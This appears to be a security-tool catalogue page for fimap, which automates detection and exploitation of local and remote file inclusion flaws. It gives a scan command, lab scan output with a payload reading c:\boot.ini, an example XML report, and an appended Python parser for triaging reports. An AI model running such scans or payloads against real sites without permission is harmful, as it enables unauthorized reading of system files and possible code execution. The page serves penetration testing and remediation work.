fimap

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security tool written in Python (run as python fimap.py) that automates the detection and exploitation of Local and Remote File Inclusion vulnerabilities.

Objective:

  • Detect and exploit Path Traversal vulnerabilities.

Features:

Supported technologies: Web applications (HTTP/HTTPS).

Operative mode: Active.

Detect and exploit Path Traversal vulnerabilities.

  • Provide the functionality to scan a single URL or a list of URLs.
  • Exploits Remote File Inclusion and Local File Inclusion vulnerabilities.
  • Provides a Google Hacking module to detect the web application resources.
  • Authentication support through cookies.

Reports:
Output reports:

  • Report in XML format listing the vulnerable URLs detected, saved to $HOME/fimap_result.xml.

    Basic usage:

    Perform a basic URL scan with a vulnerable parameter. The following instruction initiates the scan on the URL to detect and exploit the Remote/Local File Inclusion vulnerability.

    python fimap.py -s -b -u [URL]/[PAGE]?[PARAMETER]=


    Where:

    • -s: Simple mode scan focused on a single URL.
    • -u: URL with the required parameters.
    • -b: Blind mode used in cases in which the web application doesn’t throw any errors.

    The tool will begin with a quick scan trying to exploit the vulnerability. If it is not successful, the tool will switch to “Blind mode”.

    [16:51:45] [OUT] Inspecting URL 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='...
    [16:51:45] [INFO] Fiddling around with URL...
    [16:51:45] [INFO] Sniper failed. Going blind...


    When the tool detects a vulnerable point for the injection it displays the payload used.

    [16:51:45] [OUT] Possible file inclusion found blindly! -> 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005=c:\boot.ini' with Parameter 'txt005'.
    [16:51:45] [OUT] Identifying Vulnerability 'http://192.168.233.128:9001/miaplicacion/infof.php?txt005='


    The tool then performs additional tests on the vulnerable point with different payloads in order to verify and validate the vulnerability.

    [16:51:45] [WARN] Unknown language - Autodetecting...
    [16:51:45] [INFO] Autodetect thinks this could be a PHP-Script...
    [16:51:45] [INFO] If you think this is wrong start fimap with --no-auto-detect
    [16:51:45] [INFO] Testing file 'c:\boot.ini'...
    [16:51:45] [INFO] Skipping absolute file 'php://input'.
    [16:51:45] [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.


    Finally, the tool will present the scan results summary.

    ###############################################################################
    #[1] Possible PHP-File Inclusion #
    ###############################################################################
    #::REQUEST #
    # [URL] http://192.168.233.128:9001/miaplicacion/infof.php?txt005= #
    # [HEAD SENT] #
    #::VULN INFO #
    # [GET PARAM] txt005 #
    # [PATH] Not received (Blindmode) #
    # [OS] Windows #
    # [TYPE] Blindly Identified #
    # [TRUNCATION] Not tested. #
    # [READABLE FILES] #
    # [0] boot.ini -> \c:\boot.ini #
    ###############################################################################


    Example report:

    <fimap>
    <URL hostname="HOST">
    <vuln appendix="" blind="1" file="FILE" header_dict="KGRwMAou" header_vuln_key="" ispost="0" kernel="" language="PHP/ASP/JSP/other" mode="r" os="win" param="PARAM" paramvalue="" path="/URL.php?PARAM=" postdata="" prefix="\" remote="0" suffix=""/>

    </URL>
    </fimap>
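A small parser for that report format, added here as an example and not something shipped with fimap: the sample report below is constructed (host, path, parameter and file values are made up; attribute names follow the page's example), and the impact/confidence labels are this example's own triage scheme.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the shape fimap writes to $HOME/fimap_result.xml: attribute
# names come from the page's example report; host, path, parameter and file are made up.
SAMPLE_REPORT = r"""<fimap>
<URL hostname="192.168.233.128">
<vuln appendix="" blind="1" file="c:\boot.ini" header_dict="KGRwMAou" header_vuln_key=""
      ispost="0" kernel="" language="PHP" mode="r" os="win" param="txt005" paramvalue=""
      path="/miaplicacion/infof.php?txt005=" postdata="" prefix="\" remote="0" suffix=""/>
</URL>
</fimap>"""

def parse_report(xml_text):
    """One dict per <vuln> element, with fimap's "0"/"1" flags turned into booleans."""
    findings = []
    for url in ET.fromstring(xml_text).iter("URL"):
        for vuln in url.iter("vuln"):
            a = vuln.attrib
            findings.append({
                "host": url.get("hostname"),
                "path": a.get("path", ""),
                "param": a.get("param", ""),
                "method": "POST" if a.get("ispost") == "1" else "GET",
                "file": a.get("file", ""),
                "blind": a.get("blind") == "1",
                "remote": a.get("remote") == "1",
                "os": a.get("os", ""),
                # header_dict is base64; it decodes to what looks like a Python pickle
                # (assumption, not verified). Inspect the bytes, never pickle.loads() a
                # report you did not generate: unpickling runs attacker-controlled code.
                "header_blob": base64.b64decode(a.get("header_dict", "")),
            })
    return findings

def triage(finding):
    """Impact/confidence pair for a ticket (example scheme, not fimap's own)."""
    impact = "remote inclusion (code execution risk)" if finding["remote"] else "local file read"
    # Blind hits were inferred without seeing the script path or included content
    # ("[PATH] Not received (Blindmode)"), so they still need manual confirmation.
    confidence = "blind-only (verify manually)" if finding["blind"] else "confirmed by content"
    return {"impact": impact, "confidence": confidence}

def summarize(xml_text):
    lines = []
    for f in parse_report(xml_text):
        t = triage(f)
        lines.append(f"{f['host']} {f['method']} {f['path']} param={f['param']} "
                     f"file={f['file']} os={f['os']} -> {t['impact']}; {t['confidence']}")
    return lines
```

Point parse_report at the contents of $HOME/fimap_result.xml to turn a real run into ticket lines; blind-mode entries come out flagged for manual confirmation because the report carries no script path for them.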


    Resources:

    Link: http://fimap.googlecode.com
    Author(s): Iman Karim
    Contact: fimap.dev [at] gmail.com
    License: GNU GENERAL PUBLIC LICENSE Version 2